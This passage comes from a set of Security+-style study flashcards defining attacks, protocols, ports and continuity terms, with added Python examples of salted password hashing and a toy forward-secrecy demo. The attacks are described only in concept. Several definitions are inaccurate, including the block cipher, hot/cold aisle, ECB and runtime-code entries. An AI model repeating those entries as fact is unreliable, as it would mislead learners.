The fraudulent practice of sending emails ostensibly from a known or trusted sender in order to induce targeted individuals to reveal confidential information.

Directory Traversal

The goal of this attack is to use an affected application to gain unauthorized access to the file system. This attack exploits a lack of security (the software is acting exactly as it is supposed to) as opposed to exploiting a bug in the code. An attack which allows attackers to access restricted directories and execute commands outside of the web server's root directory.

Differences Between Forward Proxy and Reverse Proxy

The main difference between the two is that forward proxy is used by the client such as a web browser whereas reverse proxy is used by the server such as a web server. Forward proxy can reside in the same internal network as the client, or it can be on the Internet.

Few to no collisions

Two different inputs should never produce the same output.

Basic Input/ Output System (BIOS)

The software built into the ROM chip that is the first code run by a computer when it is powered on. Its primary function is to identify and test the devices attached to the computer that are used to input and output information, such as the keyboard, monitor, hard drives, serial communications, and so on. Some newer computers, such as Apple Macintosh computers, use EFI instead of BIOS. The BIOS includes software that provides a computer with basic instructions on how to boot. Both BIOS and UEFI can be upgraded using a process called flashing. Flashing overwrites the software within the chip with newer software.

Staging (Secure Staging Environment)

The staging environment simulates the production environment and is used for late stage testing.

WPA Cracking

There are three steps to penetrating a WPA-protected network: sniffing, parsing, and attacking.

P7b

These are Base64 encoded ASCII files.

Dynamic and private ports: 49,152- 65,535.

These ports are available for use by any application.

sftp vs ftps

They are two completely different protocols. FTPS is FTP with SSL for security. It uses a control channel and opens new connections for the data transfer. As it uses SSL, it requires a certificate. SFTP (SSH File Transfer Protocol/Secure File Transfer Protocol) was designed as an extension of SSH to provide file transfer capability, so it usually uses only the SSH port for both data and control. In most SSH server installations you will have SFTP support, but FTPS would need the additional configuration of a supported FTP server.

Require administrators to have two accounts

They use one account for regular day-to-day work. It has the same limited privileges as a regular end user.

CA Certificate

This is a certificate issued to a CA by another CA. It allows the CA that received the certificate to issue its own certificates.

End-Entity Certificate

This is a certificate issued to an end entity, which uses certificates but doesn't issue them.

Diffie-Hellman

This is a system that provides key exchange in public networks.

CER

This is an alternate form of CRT used by Microsoft.

Lack of vendor support

This vulnerability is one of the biggest reasons why systems are compromised. When the vendor no longer creates fixes for a product, vulnerabilities arise. When a vendor stops supporting a system, an operating system, or an application, it is time to start using something else.

SNMP Port

UDP 161/162

TFTP Port

UDP 69

Nontransparent proxy servers

Use URL filters to restrict access to certain sites. Both types can log user activity. This proxy is seen by the computer.

Spam filters

Used to remove spam from a user's inbox on a mail server. ▪ The challenge with any spam filter is to only filter out spam, and never filter out actual email.

fat AP

Used at home. Also known as a stand-alone, intelligent, or autonomous AP, it includes everything needed to connect wireless clients to a wireless network. It typically includes features such as a routing component, NAT, DHCP, wireless security options, access control lists (ACLs), and more. A fat AP is managed independently. A thin AP is also known as a controller-based AP and is managed by a wireless controller. The wireless controller configures the thin AP.

protocol analyzer

Used by administrators to capture, display, and analyze packets sent over a network. It is useful when troubleshooting communications problems between systems.
▪ It is also useful to detect attacks that manipulate or fragment packets.
▪ A capture shows information such as the type of traffic (protocol), flags, source and destination IP addresses, and source and destination MAC addresses.
▪ The NIC must be configured to use promiscuous mode to capture all traffic.

Internet Protocol security (IPsec)

Used to encrypt IP traffic. IPsec is used for a secure point-to-point connection traversing an insecure network such as the Internet. Authentication Header (AH) is a primary IPsec protocol that provides authentication of the sender's data.

Management frame protection

Used to protect against a disassociation attack

Block Cipher

Uses a fixed-length block and computes it against a key of the same length.

Stream Cipher

Uses a pseudorandom keystream to encrypt a single bit at a time.

Electronic Codebook (ECB)

Uses an algorithm exactly as specified.

RSA

Uses large integers to encrypt data, provides key exchange, and digital signatures.

Sandboxing

Using a virtual machine to run a suspicious program to determine if it is malware. Sandboxing runs an application within an isolated environment to test it.

WPS Attack

Wi-Fi protected setup attacks use a brute force attack, but do not need to wait for an authorized client to connect.

Peripherals

Wireless keyboards and wireless mice, Displays, External storage devices, Digital cameras, and Printers and other multi-function devices (MFDs).

Wireless keyboards and wireless mice

Wireless transmissions can sometimes be intercepted.

Hot Aisle/Cold Aisle

With a hot aisle, hot air outlets are used to cool the equipment, whereas with cold aisles, cold air intake is used to cool the equipment. Combining the two, you have cold air intake from below the aisle and hot air outtake above it, providing constant circulation. This is a more effective way of controlling temperature to safeguard your equipment in a data center.

Paper shredding

You can physically shred papers by passing them through a shredder.

Black Box Test

Zero Knowledge. Also called Closed Test. Usually from an external location. From the outsider or hacker's perspective.

Tcpdump

a command-line packet analyzer (or protocol analyzer).

SYN flood attack

a common denial-of-service (DoS) attack. In a SYN flood attack, the attacker sends multiple SYN packets but never completes the third part of the TCP handshake with the last ACK packet.

Smurf Attack

a distributed denial-of-service attack in which large numbers of Internet Control Message Protocol (ICMP) packets with the intended victim's spoofed source IP are broadcast to a computer network using an IP broadcast address. Most devices on a network will, by default, respond to this by sending a reply to the source IP address. If the number of machines on the network that receive and respond to these packets is very large, the victim's computer will be flooded with traffic. This can slow down the victim's computer to the point where it becomes impossible to work on.

Agile

a flexible model that emphasizes interaction with all players in a project.

Vishing

a form of phishing that uses the phone system or VoIP. Some vishing attempts are fully automated. Others start automated but an attacker takes over at some point during the call.

Cyber Security Incident Response Team (CSIRT)

a group of experts that assesses, documents and responds to a cyber incident.

honeynet

a group of honeypots within a separate network or zone, but accessible from an organization's primary network. Security professionals often create honeynets using multiple virtual servers contained within a single physical server.

Trusted Platform Module (TPM)

a hardware chip included on many laptops and mobile devices. It provides full disk encryption and supports a secure boot process and remote attestation. A TPM includes a unique RSA asymmetric key burned into the chip that provides a hardware root of trust.

hoax

a message, often circulated through email, that tells of impending doom from a virus or other security threat that simply doesn't exist.

Internet Protocol security (IPsec)

a method for encrypting data in transit. IPsec supports both Tunnel mode and Transport mode.

Cryptographic System

a method or process that is used to provide encryption and decryption.

Pretty Good Privacy (PGP)

a method used to secure email communication. It can encrypt, decrypt, and digitally sign email. PGP is easier to use and set up than the corporate PKI model, but it is also less robust when it comes to issues like authentication and trust. However, the full benefits of public key cryptography are used. It is simple to incorporate into a small environment.

Nmap

a network port scanner

Vishing (voice phishing)

a phone scam that attempts to defraud people by asking them to call a bogus telephone number to confirm their account information. Asking for login information over the phone.

Airgap

a physical security control that ensures that a computer or network is physically isolated from another computer or network.

Contingency Plan

a plan designed to take a possible future event or circumstance into account.

chain of custody

a process that provides assurances that evidence has been controlled and handled properly after collection. ▪ Forensic experts establish a chain of custody when they first collect evidence.

hardware security module (HSM)

a removable or external device that can generate, store, and manage RSA keys used in asymmetric encryption. Many server-based applications use an HSM to protect keys. It provides a fast solution for large asymmetric encryption calculations and is much faster than software-based cryptographic solutions.

Data execution prevention (DEP)

a security feature that prevents code from executing in memory regions marked as nonexecutable. It helps prevent an application or service from executing code from a nonexecutable memory region. ▪ The primary purpose of DEP is to protect a system from malware.

denial-of-service (DoS) attack

a service attack from a single source that attempts to disrupt the services provided by another system.

Cloud access security broker (CASB)

a software tool or service deployed between an organization's network and the cloud provider. It provides Security as a Service by monitoring traffic and enforcing security policies.

framework

a structure used to provide a foundation.

database

a structured set of data. It typically includes multiple tables and each table holds multiple columns and rows. Attackers use SQL injection attacks to pass queries to back-end databases through web servers. ▪ Input validation provides strong protection against SQL injection attacks.

Banner grabbing

a technique used to gain information about remote systems and many network scanners use it. ▪ It is often used to identify the operating system along with information about some applications.

Man-in-the-browser

a type of proxy Trojan horse that infects vulnerable web browsers. Successful man-in-the-browser attacks can capture browser session data.

Degausser

a very powerful electronic magnet. Passing a disk through a degaussing field renders the data on tape and magnetic disk drives unreadable.

virtual desktop infrastructure (VDI)

a virtual desktop; these can be created so that users can access them from a mobile device.

active scan (Wireless Scanner)

a wireless scanner acts like a scanner/cracker and can gain more information about an AP by sending queries to it.

Educating users

about new viruses, phishing attacks, and zero-day exploits helps prevent incidents.

Security Guards

control access to buildings and secure spaces.

security policies

administrative controls that identify a security plan. Personnel create plans and procedures to implement security controls and enforce the security policies. As an example, organizations often create standard operating procedures (SOPs) to support security policies. These typically include step-by-step instructions employees can use to perform common tasks or routine operations.

Mantraps

allow only a single person to pass at a time. Sophisticated mantraps can identify and authenticate individuals before allowing access. Prevents piggybacking.

Social media sites

allow people to share personal comments with a wide group of people. However, improper use of social networking sites can result in inadvertent information disclosure. Attackers can also use information available on these sites to launch attacks against users or in a cognitive password attack to change a user's password. Training helps users understand the risks.

STARTTLS

allows an encrypted version of POP or IMAP over the same standard ports as the unencrypted versions.

Lessons Learned (Incident Response Process)

allows personnel to analyze the incident and the response with a goal of preventing a future occurrence.

Wi-Fi Protected Setup (WPS)

allows users to configure wireless devices without typing in the passphrase. WPS is susceptible to brute force attacks. A WPS attack keeps trying different PINs until it succeeds.

Compensating Controls

alternative controls used instead of primary controls. e.g. Employee monitoring.

penetration test

an active test that can assess deployed security controls and determine the impact of a threat. It starts with a vulnerability scan and then tries to exploit vulnerabilities by actually attacking or simulating an attack. Penetration tests include both passive and active reconnaissance. After exploiting a system, penetration testers use privilege escalation techniques to gain more access to target systems.

Pulping

an additional step taken after shredding paper. It reduces the shredded paper to mash or puree by soaking it in liquid.

security incident

an adverse event or series of events that can negatively affect the confidentiality, integrity, or availability of data or systems within the organization, or that has the potential to do so.

Secure DevOps

an agile-aligned methodology that stresses security throughout the lifetime of the project.

SLA

an agreement between a company and a vendor. It stipulates performance expectations, such as minimum uptime and maximum downtime levels for a service. If the parties will be handling sensitive data, they should include an ISA to ensure strict guidelines are in place to protect the data while in transit. An MOU/MOA often supports an ISA.

false positive

an alert or alarm on an event that is nonthreatening, benign, or harmless. A false positive incorrectly indicates an attack is occurring when an attack is not active. A high incidence of false positives increases the administrator's workload.

Recovery Site

an alternate processing site that an organization can use after a disaster. Types include: hot site, cold site, warm site, and mobile sites.

Domain hijacking attack

an attacker changes the registration of a domain name without permission from the owner.

NFC attack

an attacker uses an NFC reader to capture data from another NFC device. One method is an eavesdropping attack. The NFC reader uses an antenna to boost its range, and intercepts the data transfer between two other devices.

script kiddie

an attacker who uses existing computer scripts or code to launch attacks. Script kiddies typically have very little expertise, sophistication, and funding.

Data privacy officer

an executive responsible for ensuring the organization complies with relevant laws.

RAID 6

an extension of RAID 5, and it includes an additional parity block. A fault tolerant solution that uses dual parity and striping. A minimum of four disks is required for RAID-6. Dual parity allows RAID-6 to recover from the simultaneous failure of up to two disks. Critical data should be stored on a RAID-6 system.

RAID

an inexpensive method used to add fault tolerance and increase availability.

PSH (PUSH Flag)

an option provided by TCP that allows the sending application to start sending the data even when the buffer is not full (contains less data than the MTU). The application needs to set the PSH flag to true for the socket, and with that TCP starts pushing the data immediately.

Dynamic analysis

analysis that takes into account the passage of time. It checks the code while it is running.

Operating system (OS) detection techniques

analyze packets from an IP address to identify the OS. (Network scanner)

single point of failure

any component whose failure results in the failure of an entire system. Elements such as RAID, failover clustering, UPSs, and generators remove many single points of failure.

embedded system

any device that has a dedicated function and uses a computer system to perform that function. It includes any devices in the Internet of things (IoT) category, such as wearable technology and home automation systems. Some embedded systems use a system on a chip (SoC).

Key Exchange

any method in cryptography by which cryptographic keys are exchanged between two parties to allow use of a cryptographic algorithm.

Manmade threat

any potential dangers from people and can be either malicious or accidental.

insider

anyone who has legitimate access to an organization's internal resources, such as an employee of a company.

XaaS

anything as a service - a cloud computing model that can work with a combination of other models: SaaS, IaaS, PaaS

Trojan

appears to be something useful but includes a malicious component, such as installing a backdoor on a user's system. Many Trojans are delivered via drive-by downloads. They can also infect systems from fake antivirus software, pirated software, games, or infected USB drives.

Unified Threat Management (UTM)

appliance combines multiple security controls into a single appliance. They can inspect data streams and often include URL filtering, malware inspection, and content inspection components. Many UTMs include a DDoS mitigator to block DDoS attacks.

Failover clusters

are a group of servers that work together to maintain high availability.

Rainbow table attacks

are a type of attack that attempts to discover the password from the hash. A rainbow table is a huge database of precomputed hashes. Password Attack

Proximity cards

are credit card-sized access cards. Users pass the card near a proximity card reader and the card reader then reads data on the card. ▪ Some access control points use proximity cards with PINs for authentication.

Tabletop exercises

are discussion-based sessions where team members meet in an informal setting to discuss their roles during an emergency and their responses to a particular emergency situation.

Bollards

are effective barricades that can block vehicles.

Cable locks

are effective threat deterrents for small equipment such as laptops and some workstations. ▪ When used properly, they prevent losses due to theft of small equipment. ▪ Locking cabinets in server rooms provide an added physical security measure.

Network-based firewalls

are often dedicated servers or appliances and provide protection for the network.

Advanced persistent threats (APTs)

are sponsored by governments and they launch sophisticated, targeted attacks.

Test restores

are the best way to test the integrity of a company's backup data.

Zero-day exploits

are undocumented and unknown to the public. The vendor might know about it, but has not yet released a patch to address it.

Man-in-the-middle (MITM)

attack is a form of active interception or active eavesdropping. ▪ ARP poisoning attacks attempt to mislead systems about the actual MAC address of a system. ▪ ARP poisoning is sometimes used in man-in-the-middle attacks.

Cross-site scripting (XSS)

attacks allow attackers to capture user information such as cookies. ▪ Technique where attackers embed malicious HTML or JavaScript code into a web site's code. The code executes when the user visits the site. ▪ Input validation techniques at the server help prevent XSS attacks.

Brute force attacks

attempt to guess passwords. ▪ Online attacks guess the password of an online system. ▪ Offline attacks guess the password stored within a file, such as a database. Password Attack

Fire suppression methods

attempt to remove or disrupt one of these elements to extinguish a fire... Remove the heat, Remove the oxygen, Remove the fuel, and Disrupt the chain reaction

keylogger

attempts to capture a user's keystrokes. The keystrokes are stored in a file, and are either sent to an attacker automatically, or the attacker may manually retrieve the file.

password cracker

attempts to discover a password.

offline password cracker

attempts to discover passwords by analyzing a database or file containing passwords.

online password cracker

attempts to discover passwords by guessing them in a brute force attack.

watering hole attack

attempts to discover which web sites a group of people are likely to visit and then infects those web sites with malware that can infect the visitors.

Pass the hash attack

uses an intercepted user's password hash to access the user's account. ▪ Salting adds random text to passwords before hashing them and thwarts many password attacks, including rainbow table attacks. Password Attack

Obfuscation

attempts to make something unclear or difficult to understand. ▪ Code obfuscation (or code camouflage) attempts to make the code unreadable.

MAC flood attack

attempts to overload a switch with different MAC addresses associated with each physical port.

Attribute-based access control (ABAC) evaluates

attributes and grants access based on the value of these attributes. Attributes can be almost any characteristic of a user, the environment, or the resource. The ABAC model uses attributes defined in policies to grant access to resources. It's commonly used in software defined networks (SDNs).

Incremental Backup

backs up only the changed data since the last backup -- be it a full or incremental backup. Number of backups increment until the next full.

Differential Backup

backs up only the files that changed since the last full backup. There will be two backups at any given point. Example: You perform a full backup on Sunday. On Monday you back up only the files that changed since Sunday, on Tuesday you back up only the files that changed since Sunday, and so on until the next full backup.

Regulatory framework

based on relevant laws and regulations.

Antispoofing methods

block traffic using ACL rules.

stateful firewall

blocks traffic based on the state of the packet within a session.

stateless firewall

blocks traffic using an ACL.

Quantitative risk assessment

comes into play when we have the ability to map a dollar amount to a specific risk. 1. Asset Value (AV) 2. Exposure Factor (EF) 3. Single Loss Expectancy (SLE) 4. Annual Rate of Occurrence (ARO) 5. Annual Loss Expectancy (ALE)

Exit interview

conducted with departing employees just before they leave an organization. ▪ User accounts are often disabled or deleted during the exit interview and everything issued to the employee is collected.

limit the range of an AP to a room or building

by reducing the AP's power level. This prevents people from connecting because they will be out of the AP's range.

Passphrase

can also contain symbols, and does not have to be a proper sentence or grammatically correct. The main difference between the two is that passwords do not have spaces, while passphrases have spaces and are longer than any random string of letters.

Competitors

can also engage in attacks. Their motivation is typically to gain proprietary information about another company.

Biometric locks

can also identify and authenticate users.

Local Registration Authority (LRA)

can be used to identify or establish the identity of an individual for certificate issuance.

External threat

can come from any source outside the organization.

Registration Authority (RA)

can distribute keys, accept registrations for the CA, and validate identities.

cloud-based DLP

can enforce security policies for data stored in the cloud, such as ensuring that Personally Identifiable Information (PII) is encrypted.

vulnerability scanner

can identify vulnerabilities, misconfigured systems, and the lack of security controls such as up-to-date patches. Vulnerability scans are passive and have little impact on a system during a test.

Switch

can learn which computers are attached to each of its physical ports. If an attacker installed a protocol analyzer on a computer attached to a switch port, the protocol analyzer would not capture traffic that is not intended for that port.

Wireless scanners

can typically use both passive and active scans.

Replay attacks

capture data in a session with the intent of later impersonating one of the parties in the session. ▪ Timestamps and sequence numbers are effective countermeasures against replay attacks. Password Attack

background check

checks into a potential employee's history with the intention of discovering anything about the person that might make him a less-than-ideal fit for a job. ▪ They may include criminal checks, credit checks, and an individual's online activity.

Runtime code

code that is evaluated, interpreted, and executed when the code is run. As an example, HTML is the standard used to create web pages.

botnet

combines the words robot and network. It includes multiple computers that act as software robots (bots) and function together in a network (such as the Internet), often for malicious purposes. The bots in a botnet are often called zombies and they will do the bidding of whoever controls the botnet. Botnets are used to launch DDoS attacks.

transitive trust

creates an indirect trust relationship. e.g. if subject A trusts subject B and subject B trusts subject C, then A would trust C if the trust between A and B was transitive.

Confidential Data

information that is kept secret among a certain group of people.

Public Data

data is available to anyone.

Proprietary Data

data related to ownership, such as patents or trade secrets.

Account expiration

dates automatically disable accounts on the expiration date. This is useful for temporary accounts such as temporary contractors.

incident response policy

defines a security incident and incident response procedures.

Acceptable use policy (AUP)

defines proper system usage or the rules of behavior for employees when using information technology (IT) systems.

Memorandum of Understanding (MOU) or Memorandum of Agreement (MOA)

defines responsibilities of each party, but it is not as strict as a Service Level Agreement (SLA) or Interconnection Security Agreement (ISA).

Real-time Transport Protocol (RTP)

delivers audio and video over IP networks. Typically uses unprivileged UDP ports (1024 to 65535).

Recovery Point Objective (RPO)

describes the interval of time that might pass during a disruption before the quantity of data lost during that period exceeds the BCP's maximum allowable threshold or "tolerance." It defines the point at which the system needs to be restored. This could be where the system was two days before it crashed (whip out the old backup tapes) or five minutes before it crashed (requiring complete redundancy). This is an essential business goal insofar as system restoration and acceptable data loss are concerned.

Antivirus and Anti-Malware Software

detects and removes malware, such as viruses, Trojans, and worms. Some antivirus scanners use file integrity checkers to detect modified system files.

Heuristic-based software

detects previously unknown malware based on behavior.

Signs

deter many people from entering a restricted area.

Corporate-owned, personally enabled (COPE)

devices are owned by the organization, but employees can use them for personal reasons.

Network mapping

discovers devices on the network and how they are connected with each other.

RAID 1

disk mirroring/duplexing: Allows one disk in a pair to fail. RAID-1 can be used where fault tolerance is required over performance, such as on an authentication server.

RAID 5

disk striping with parity: Allows one disk to fail in a set of at least three disks, with one disk's worth of space being used for parity information. However, the parity information is distributed across all the disks. RAID-5 can recover from a single disk failure.

RAID 0

disk striping: Provides no fault tolerance. It is not a fault tolerant solution but does improve disk performance for read/write operations. Striping requires a minimum of two disks and does not use parity. RAID-0 can be used where performance is required over fault tolerance, such as a media streaming server.

ipconfig /displaydns

displays all cached DNS entries on a Windows system.

Mobile sites

do not have dedicated locations, but can provide temporary support during a disaster.

Data classifications

ensure that users understand the value of data, and the classifications help protect sensitive data. Classifications can apply to hard data (printouts) and soft data (files). Data classifications and data labeling help ensure personnel apply the proper security controls to protect information.

Access Control Models

ensure that only authenticated and authorized entities can access resources. ▪ Role-based access control (Role-BAC) ▪ Rule-based access control (Rule-BAC) ▪ Discretionary access control (DAC) ▪ Mandatory access control (MAC) ▪ Attribute-based access control (ABAC)

Role-based training

ensures that personnel receive the training they need. For example, executives need training on whaling attacks. Common roles that require role-based training are data owners, system administrators, system owners, end users, privileged users, and executive users.

supply chain assessment

evaluates everything needed to produce and sell a product. ▪ It includes all the raw materials and processes required to create and distribute a finished product.

Discretionary access control (DAC) model

every object (such as files and folders) has an owner, and the owner establishes access for the objects. Many operating systems, such as Windows and most Unix-based systems, use the DAC model. The DAC model specifies that every object has an owner, and the owner has full, explicit control of the object. Microsoft's NTFS filesystem uses the DAC model.

In-Band key

exchange is when the same channel that requires encryption is also used to exchange keys.

Out-of-Band key

exchange uses any means other than the channel that requires encryption to exchange keys.

firewall

filters incoming and outgoing traffic for a single host or between networks. Firewalls use a deny any any, deny any, or a drop all statement at the end of the ACL to enforce an implicit deny strategy. ▪ The statement forces the firewall to block any traffic that wasn't previously allowed in the ACL. The implicit deny strategy provides a secure starting point for a firewall.

Netcat

for remotely accessing Linux systems.

proxy server

forwards requests for services from a client. It provides caching to improve performance and reduce Internet bandwidth usage.

Data steward or custodian

handles routine tasks to protect data.

Compiled code

has been optimized by an application (called a compiler) and converted into an executable file. The compiler checks the program for errors and provides a report of items developers might like to check.

Data owner

has overall responsibility for the protection of the data.

Rootkits

have system-level or kernel access and can modify system files and system access. Rootkits hide their running processes to avoid detection with hooking techniques. Tools that can inspect RAM can discover these hidden hooked processes.

Temperature controls

help ensure a relatively constant temperature.

Business continuity planning

helps an organization predict and plan for potential outages of critical services or functions. The goal is to ensure that critical business operations continue and the organization can survive the outage.

DNSSEC

helps prevent DNS poisoning attacks.

Shielding

helps prevent electromagnetic interference (EMI) and radio frequency interference (RFI) from interfering with normal signal transmissions. EMI shielding prevents outside interference sources from corrupting data and prevents data from emanating outside the cable.

Preparation

helps prevent incidents such as malware infections. Personnel review the policy periodically and in response to lessons learned after incidents.

Error and exception handling

helps protect the integrity of the operating system and controls the errors shown to users. Applications should show generic error messages to users but log detailed information.

Forensic evaluation

helps the organization collect and analyze data as evidence it can use in the prosecution of a crime. When collecting data for a forensic analysis, you should collect it from the most volatile to the least volatile.

Disabling SSID broadcast

hides the network from casual users, but an attacker can easily discover it with a wireless sniffer.

Two types of IDSs

host-based intrusion detection system (HIDS) and network-based intrusion detection system (NIDS)

data retention policy

identifies how long data is retained, and sometimes specifies where it is stored.

Business impact analysis (BIA)

identifies mission-essential functions and critical systems that are essential to the organization's success. ▪ It also identifies maximum downtime limits for these systems and components, various scenarios that can impact these systems and components, and the potential losses from an incident.

Mean Time to Recover (MTTR)

identifies the average (the arithmetic mean) time it takes to restore a failed system.

Recovery Time Objective (RTO)

identifies the maximum amount of time it should take to restore a system after an outage. It is derived from the maximum allowable outage time identified in the BIA.

Passive scan

identifies the active operating systems, applications, and ports throughout a network, monitoring activity to determine the network's vulnerabilities. However, while passive scanners can provide information about weaknesses, they can't take action to resolve security problems. These scanners can check the current software and patch versions on networked devices, indicating which devices are using software that presents a potential gateway for hackers or trojan attacks, and reference this information against public databases containing lists of current patches. A network administrator can set passive scanners to run continuously or to operate at specified intervals.

Access Control List (ACL)

identifies what traffic is allowed and what traffic is blocked. An ACL can control traffic based on networks, subnets, IP addresses, ports, and some protocols. Implicit deny blocks all access that has not been explicitly granted. Routers and firewalls use implicit deny as the last rule in the access control list.

Environmental threat

includes natural threats such as weather events.

DNS zones

include records such as A records for IPv4 addresses and AAAA records for IPv6 addresses.

Scheduling methods

include round-robin and source IP address affinity. ▪ Source IP address affinity scheduling ensures clients are redirected to the same server for an entire session.

Geographic considerations for backups

include storing backups off-site, choosing the best location, and considering legal implications and data sovereignty.

Disaster Recovery plan (DRP)

includes a hierarchical list of critical systems and often prioritizes services to restore after an outage. Testing validates the plan. The final phase of disaster recovery includes a review to identify any lessons learned and may include an update of the plan.

Malware (malicious software)

includes a wide range of software that has malicious intent. When adware first emerged, its intent was primarily to learn a user's habits for the purpose of targeted advertising. As the practice of gathering information on users became more malicious, more people began to call it spyware.

asset

includes any product, system, resource, or process that an organization values.

Switch port security

includes disabling unused ports and limiting the number of MAC addresses per port. A more advanced implementation is to restrict each physical port to only a single specific MAC address.

Personally Identifiable Information (PII)

includes information such as a full name, birth date, biometric data, and identifying numbers such as a SSN. Organizations have an obligation to protect PII and PHI and often identify procedures for handling and retaining PII in data policies.

hot site

includes personnel, equipment, software, and communication capabilities of the primary site with all the data up to date. A hot site provides the shortest recovery time compared with warm and cold sites. It is the most effective disaster recovery solution, but it is also the most expensive to maintain.

Mobile device management (MDM)

includes the technologies used to manage mobile devices. Typical MDM capabilities are application management, full device encryption, storage segmentation, content management, containerization, passwords and PINs, biometrics, screen locks, remote wipe, geofencing, GPS tagging, and context-aware authentication.

Hybrid Cloud

includes two or more private, public, or community clouds, but each cloud remains separate and is only linked by technology that enables data and application portability

Amplification attacks

increase the amount of traffic sent to or requested from a victim and can be used against a wide variety of systems, including individual hosts, DNS servers, and NTP servers. Smurf attack spoofs the source address of a directed broadcast ping packet to flood a victim with ping replies.

Load balancing

increases the overall processing power of a service by sharing the load among multiple servers. Configurations can be active-passive, or active-active.

false positive from a vulnerability scan

indicates the scan detected a vulnerability, but the vulnerability doesn't exist.

Private Data

information about individuals that should remain private.

Honeypot

intended to look sweet to the attacker, it's a server that is left open or appears to have been sloppily locked down, allowing an attacker relatively easy access. The intent is for the server to look like an easy target so that the attacker spends his time in the honeypot instead of in a live network.

Demilitarized zone (DMZ)

is a buffer zone between a private network and the Internet, typically bounded by firewalls, where Internet-facing servers are placed so that a compromise of one of them does not give direct access to the internal network.

Omni Antenna

is a class of antenna that radiates equal radio power in all directions perpendicular to an axis (azimuthal directions), with power varying with angle to the axis (elevation angle) and declining to zero on the axis. A half-wave dipole is itself omnidirectional in azimuth; compared with an idealized isotropic source radiating the same power, it puts more power toward the horizon and less along its axis.

Purging

is a general sanitization term indicating that all sensitive data has been removed from a device.

bcrypt

is a key derivation function for passwords based on the Blowfish cipher. Besides incorporating a salt to protect against rainbow table attacks, bcrypt is an adaptive function: its cost factor (work factor) can be increased over time to make it slower, so it remains resistant to brute-force attacks as computing power increases. bcrypt is the default password hash on OpenBSD and is widely used on other systems.
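
The salt-plus-adaptive-cost pattern, and the part the card leaves out (what "increase the cost over time" looks like against a database of existing hashes), as an added example that is not from the original card. bcrypt itself is not in the Python standard library, so this uses PBKDF2-HMAC-SHA256 from `hashlib` as a stand-in for the same idea; the storage format string and the iteration counts are constructed for the example, not a standard:

```python
"""Added example: salted, adaptive password hashing with an upgrade-on-login
path. Uses hashlib's PBKDF2 as a stand-in for bcrypt; the storage format
"algo$iterations$salt$hash" is constructed for this example."""
import base64
import hashlib
import hmac
import os

ALGO = "pbkdf2_sha256"
CURRENT_ITERATIONS = 50_000   # the policy value; raise it as hardware gets faster

def hash_password(password: str, iterations: int = CURRENT_ITERATIONS) -> str:
    """Fresh random salt per password, so equal passwords give different hashes
    and precomputed (rainbow) tables are useless."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "$".join([ALGO, str(iterations),
                     base64.b64encode(salt).decode(),
                     base64.b64encode(dk).decode()])

def verify_password(password: str, stored: str) -> bool:
    """Recompute with the parameters stored alongside the hash and compare in
    constant time, so timing does not leak how many bytes matched."""
    algo, iterations, salt_b64, dk_b64 = stored.split("$")
    if algo != ALGO:
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(dk_b64)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt,
                             int(iterations), dklen=len(expected))
    return hmac.compare_digest(dk, expected)

def needs_rehash(stored: str) -> bool:
    """True when the stored hash was made with a weaker cost than current policy."""
    return int(stored.split("$")[1]) < CURRENT_ITERATIONS

def login(password: str, stored: str):
    """Returns (ok, replacement_hash_or_None). The only time the plaintext is
    available is at login, so that is the only time an old hash can be upgraded."""
    if not verify_password(password, stored):
        return False, None
    if needs_rehash(stored):
        return True, hash_password(password)
    return True, None

if __name__ == "__main__":
    old = hash_password("hunter2", iterations=10_000)   # hash made under an older policy
    ok, upgraded = login("hunter2", old)
    print(ok, needs_rehash(old), upgraded is not None and not needs_rehash(upgraded))
```

The same three pieces apply to bcrypt proper: the cost is encoded in the hash string (`$2b$12$...`, where 12 is the cost), verification reads it back, and a `needs_rehash` check at login is how a fleet of old hashes is migrated to a higher cost without ever storing plaintext.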

SPOF (Single Point of Failure)

is a part of a system that, if it fails, will stop the entire system from working. SPOFs are undesirable in any system with a goal of high availability or reliability, be it a business practice, software application, or other industrial system.

Forward Secrecy

is a property of a key exchange in which the compromise of a long-term key (such as a server's private key) does not compromise the session keys of past sessions, because each session derives its key from fresh ephemeral values (for example DHE or ECDHE in TLS). It is commonly called perfect forward secrecy (PFS). Without it, an attacker who recorded traffic can decrypt it later after obtaining the long-term key.
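
Why ephemeral key agreement has this property and a static one does not, as an added example that is not from the original card. The Diffie-Hellman group here is a toy (a 127-bit Mersenne prime with generator 3) chosen so the code runs instantly; it is not a secure parameter set, and real protocols also sign the ephemeral value with the long-term key, which is omitted here:

```python
"""Added example: forward secrecy demonstrated with ephemeral vs. static
Diffie-Hellman over a toy group. P and G are NOT secure parameters."""
import secrets

P = 2**127 - 1   # toy modulus (a Mersenne prime), not a safe prime for real use
G = 3

def keypair():
    priv = secrets.randbelow(P - 2) + 1
    return priv, pow(G, priv, P)

def shared_secret(priv, peer_pub):
    return pow(peer_pub, priv, P)

class Server:
    def __init__(self):
        # The long-term key: the one an attacker may steal months later.
        self.long_term_priv, self.long_term_pub = keypair()

    def static_session(self, client_pub):
        """Static DH: the long-term key itself is used for key agreement."""
        key = shared_secret(self.long_term_priv, client_pub)
        transcript = {"client_pub": client_pub, "server_pub": self.long_term_pub}
        return key, transcript

    def ephemeral_session(self, client_pub):
        """Ephemeral DH (DHE): a fresh key pair per session, private half discarded.
        In TLS the ephemeral public value is signed with the long-term key so the
        client knows who it is talking to, but the long-term key never enters the
        secret itself."""
        eph_priv, eph_pub = keypair()
        key = shared_secret(eph_priv, client_pub)
        del eph_priv                       # gone once the session ends
        transcript = {"client_pub": client_pub, "server_pub": eph_pub}
        return key, transcript

def offline_attack(transcript, stolen_long_term_priv):
    """The attacker recorded the transcript earlier and has now stolen the
    server's long-term private key. Returns the key it believes it recovered."""
    return shared_secret(stolen_long_term_priv, transcript["client_pub"])

def demo():
    server = Server()
    client_priv, client_pub = keypair()
    static_key, t1 = server.static_session(client_pub)
    eph_key, t2 = server.ephemeral_session(client_pub)
    return {
        # both sides of each exchange agree on the session key
        "keys_agree": (shared_secret(client_priv, t1["server_pub"]) == static_key
                       and shared_secret(client_priv, t2["server_pub"]) == eph_key),
        # later key theft recovers the static session but not the ephemeral one
        "static_broken": offline_attack(t1, server.long_term_priv) == static_key,
        "ephemeral_broken": offline_attack(t2, server.long_term_priv) == eph_key,
    }

if __name__ == "__main__":
    print(demo())
```

The transcript is identical in shape for both modes; the difference is only whether the value the attacker later steals was ever an input to the session key.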

Secure File Transfer Protocol (SFTP)

